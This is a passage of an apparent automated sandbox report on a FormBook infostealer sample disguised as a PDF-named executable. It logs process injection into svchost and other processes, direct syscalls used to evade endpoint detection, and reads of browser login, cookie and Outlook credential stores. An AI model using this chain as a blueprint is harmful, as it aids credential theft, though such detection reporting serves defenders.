              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4096B mov eax, dword ptr fs:[00000030h]1_2_03C4096B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36970 mov eax, dword ptr fs:[00000030h]1_2_03C36970
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86912 mov eax, dword ptr fs:[00000030h]1_2_03C86912
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62919 mov eax, dword ptr fs:[00000030h]1_2_03C62919
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62919 mov eax, dword ptr fs:[00000030h]1_2_03C62919
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF892E mov eax, dword ptr fs:[00000030h]1_2_03CF892E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF892E mov eax, dword ptr fs:[00000030h]1_2_03CF892E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC920 mov ecx, dword ptr fs:[00000030h]1_2_03CAC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC920 mov eax, dword ptr fs:[00000030h]1_2_03CAC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC920 mov eax, dword ptr fs:[00000030h]1_2_03CAC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC920 mov eax, dword ptr fs:[00000030h]1_2_03CAC920
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8693A mov eax, dword ptr fs:[00000030h]1_2_03C8693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8693A mov eax, dword ptr fs:[00000030h]1_2_03C8693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8693A mov eax, dword ptr fs:[00000030h]1_2_03C8693A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0492D mov eax, dword ptr fs:[00000030h]1_2_03D0492D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428C0 mov eax, dword ptr fs:[00000030h]1_2_03C428C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C288C8 mov eax, dword ptr fs:[00000030h]1_2_03C288C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C288C8 mov eax, dword ptr fs:[00000030h]1_2_03C288C8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C308CD mov eax, dword ptr fs:[00000030h]1_2_03C308CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C308CD mov eax, dword ptr fs:[00000030h]1_2_03C308CD
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A8F0 mov eax, dword ptr fs:[00000030h]1_2_03C3A8F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C648F0 mov eax, dword ptr fs:[00000030h]1_2_03C648F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC88FB mov eax, dword ptr fs:[00000030h]1_2_03CC88FB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB488F mov eax, dword ptr fs:[00000030h]1_2_03CB488F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56882 mov eax, dword ptr fs:[00000030h]1_2_03C56882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56882 mov eax, dword ptr fs:[00000030h]1_2_03C56882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C56882 mov eax, dword ptr fs:[00000030h]1_2_03C56882
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7088E mov eax, dword ptr fs:[00000030h]1_2_03C7088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7088E mov edx, dword ptr fs:[00000030h]1_2_03C7088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7088E mov eax, dword ptr fs:[00000030h]1_2_03C7088E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE8890 mov eax, dword ptr fs:[00000030h]1_2_03CE8890
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE8890 mov eax, dword ptr fs:[00000030h]1_2_03CE8890
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC870 mov eax, dword ptr fs:[00000030h]1_2_03CBC870
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C819 mov eax, dword ptr fs:[00000030h]1_2_03C6C819
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C819 mov eax, dword ptr fs:[00000030h]1_2_03C6C819
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0835 mov eax, dword ptr fs:[00000030h]1_2_03CE0835
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEEFD3 mov eax, dword ptr fs:[00000030h]1_2_03CEEFD3
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov ecx, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov ecx, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov ecx, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov ecx, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C46FE0 mov eax, dword ptr fs:[00000030h]1_2_03C46FE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04FFF mov eax, dword ptr fs:[00000030h]1_2_03D04FFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58FFB mov eax, dword ptr fs:[00000030h]1_2_03C58FFB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8F8B mov eax, dword ptr fs:[00000030h]1_2_03CB8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8F8B mov eax, dword ptr fs:[00000030h]1_2_03CB8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8F8B mov eax, dword ptr fs:[00000030h]1_2_03CB8F8B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov ecx, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40F90 mov eax, dword ptr fs:[00000030h]1_2_03C40F90
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34FB6 mov eax, dword ptr fs:[00000030h]1_2_03C34FB6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5CFB0 mov eax, dword ptr fs:[00000030h]1_2_03C5CFB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5CFB0 mov eax, dword ptr fs:[00000030h]1_2_03C5CFB0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68FBC mov eax, dword ptr fs:[00000030h]1_2_03C68FBC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEAF50 mov ecx, dword ptr fs:[00000030h]1_2_03CEAF50
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEEF66 mov eax, dword ptr fs:[00000030h]1_2_03CEEF66
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04F7C mov eax, dword ptr fs:[00000030h]1_2_03D04F7C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5AF72 mov eax, dword ptr fs:[00000030h]1_2_03C5AF72
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C86F70 mov eax, dword ptr fs:[00000030h]1_2_03C86F70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2EF79 mov eax, dword ptr fs:[00000030h]1_2_03C2EF79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2EF79 mov eax, dword ptr fs:[00000030h]1_2_03C2EF79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2EF79 mov eax, dword ptr fs:[00000030h]1_2_03C2EF79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4CF00 mov eax, dword ptr fs:[00000030h]1_2_03C4CF00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4CF00 mov eax, dword ptr fs:[00000030h]1_2_03C4CF00
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04F1D mov eax, dword ptr fs:[00000030h]1_2_03D04F1D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70F16 mov eax, dword ptr fs:[00000030h]1_2_03C70F16
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70F16 mov eax, dword ptr fs:[00000030h]1_2_03C70F16
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70F16 mov eax, dword ptr fs:[00000030h]1_2_03C70F16
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037A66C GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0037A66C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003681AC
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00368189 SetUnhandledExceptionFilter,0_2_00368189

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x32AC43CJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x32AAA88Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtTerminateThread: Direct from: 0x7FF88A502651Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x32B7309Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x32ABDADJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x32B359CJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x32AC4A9Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x32B34EDJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x32B3451Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x32B4AD4Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x32B3644Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4743BBAJump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x4743D89Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x4743E00Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x474B947Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x32AB682Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x32AC468Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x32B36E2
              Maps a DLL or memory area into another process
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\newdev.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Windows\SysWOW64\svchost.exeThread register set: target process: 7548Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeThread register set: target process: 7548Jump to behavior
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\svchost.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3077008Jump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037B106 LogonUserW,0_2_0037B106
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00343D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00343D19
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0038411C SendInput,keybd_event,0_2_0038411C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003874BB mouse_event,0_2_003874BB
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe"Jump to behavior
              Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0037A66C GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0037A66C
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003871FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_003871FA
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerpR
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
              Source: RAVCpl64.exe, 00000002.00000002.11194758898.0000000000D51000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000002.00000000.6499287256.0000000000D51000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003665C4 cpuid 0_2_003665C4
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0039091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_0039091D
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_003BB340 GetUserNameW,0_2_003BB340
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_00371E8E GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00371E8E
              Source: C:\Users\user\Desktop\HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeCode function: 0_2_0035DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0035DDC0
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exe, 00000000.00000002.6129559353.0000000001027000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mcupdate.exe

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.6565186036.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6805063902.0000000004830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.6571557042.0000000006630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.6804979638.00000000047E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\newdev.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\newdev.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_81
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: WIN_XP
              Source: HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
